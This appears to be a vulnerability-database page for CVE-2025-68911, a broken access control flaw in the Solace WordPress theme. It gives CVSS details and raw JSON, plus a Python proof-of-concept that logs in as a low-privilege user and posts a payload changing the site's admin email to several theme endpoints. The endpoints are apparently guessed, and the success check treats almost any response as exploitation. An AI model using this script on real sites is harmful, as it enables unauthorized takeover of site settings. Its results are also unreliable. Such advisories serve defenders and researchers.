Security Vulnerability Report
中文
CVE-2025-68911 CVSS 6.5 MEDIUM

CVE-2025-68911

Published: 2026-01-22 17:16:15
Last Modified: 2026-04-27 19:16:38

Description

Missing Authorization vulnerability in solacewp Solace solace allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Solace: from n/a through <= 2.1.16.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Solace WordPress Theme <= 2.1.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68911 PoC - WordPress Solace Theme Missing Authorization # Requires authenticated low-privilege user (subscriber/contributor role) import requests import sys from urllib.parse import urljoin def check_vulnerability(target_url, username, password): """Check if target is vulnerable to CVE-2025-68911""" session = requests.Session() # Step 1: Login as low-privilege user login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful as low-privilege user") # Step 2: Try to access protected Solace theme functions # Common vulnerable endpoints in Solace theme vulnerable_endpoints = [ '/wp-admin/admin-ajax.php?action=solace_save_settings', '/wp-json/solace/v1/settings', '/wp-admin/admin-ajax.php?action=solace_customizer_save', '/wp-admin/admin-ajax.php?action=solace_import_settings' ] for endpoint in vulnerable_endpoints: full_url = urljoin(target_url, endpoint) # Try POST request with malicious data exploit_data = { 'solace_settings': '{"admin_email":"[email protected]"}', 'nonce': '' # May not be required due to missing authorization } response = session.post(full_url, data=exploit_data, timeout=10) # Check for successful exploitation indicators if response.status_code == 200: if 'success' in response.text.lower() or response.text: print(f"[+] Potentially vulnerable endpoint found: {endpoint}") print(f"[+] Response: {response.text[:200]}") return True print("[-] No vulnerable endpoints detected (may require manual testing)") return False if __name__ == '__main__': if len(sys.argv) < 4: print("Usage: python cve-2025-68911.py <target_url> <username> <password>") print("Example: python cve-2025-68911.py http://example.com/ subscriber password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] check_vulnerability(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68911", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:15.110", "lastModified": "2026-04-27T19:16:38.030", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in solacewp Solace solace allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Solace: from n/a through <= 2.1.16."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en solacewp Solace solace permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Solace: desde n/a hasta &lt;= 2.1.16."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/solace/vulnerability/wordpress-solace-theme-2-1-16-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}